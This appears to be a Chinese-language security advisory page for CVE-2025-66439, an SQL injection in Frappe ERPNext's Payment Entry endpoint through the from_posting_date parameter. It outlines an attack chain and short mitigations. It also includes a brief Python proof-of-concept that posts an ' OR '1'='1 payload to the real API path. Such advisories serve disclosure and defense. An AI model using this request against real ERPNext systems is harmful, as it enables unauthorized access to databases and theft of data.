CVE-2025-66439 CVSS 8.8 高危

CVE-2025-66439: Frappe ERPNext SQL注入漏洞导致数据库敏感信息泄露

披露日期: 2025-12-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-66439

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Frappe ERPNext (<=15.89.0)

漏洞概述

Frappe ERPNext 15.89.0及之前版本存在严重SQL注入漏洞，攻击者可通过Payment Entry模块的get_outstanding_reference_documents函数，利用from_posting_date参数注入恶意SQL代码，实现数据库未授权访问和敏感数据窃取。该漏洞无需高级权限即可利用，对系统安全性构成重大威胁。

技术细节

漏洞源于payment_entry.py中get_outstanding_reference_documents()函数直接拼接用户输入的from_posting_date参数，缺少严格输入验证和参数化查询保护。攻击者可构造特殊SQL payload绕过现有过滤机制，执行任意SQL命令，导致敏感信息泄露和潜在数据篡改风险。

攻击链分析

STEP 1

识别目标系统使用Frappe ERPNext且版本<=15.89.0

STEP 2

构造SQL注入payload绕过参数过滤

STEP 3

执行恶意SQL语句获取数据库敏感信息

STEP 4

利用泄露数据进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

url = "http://target-site.com/api/method/erpnext.accounts.doctype.payment_entry.payment_entry.get_outstanding_reference_documents"
headers = {"Authorization": "Bearer <token>"}
payload = {"from_posting_date": "' OR '1'='1"}
response = requests.post(url, json=payload, headers=headers)
print(response.json())

影响范围

Frappe ERPNext <=15.89.0

防御指南

临时缓解措施

紧急部署输入验证层，限制Payment Entry模块访问权限，监控异常数据库查询行为

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66439
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66439
3 Details https://www.cvedetails.com/cve/CVE-2025-66439/
4 VulDB https://vuldb.com/cve/CVE-2025-66439
5 Link https://github.com/frappe/frappe/security
6 Link https://iamanc.github.io/post/erpnext-sqli

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表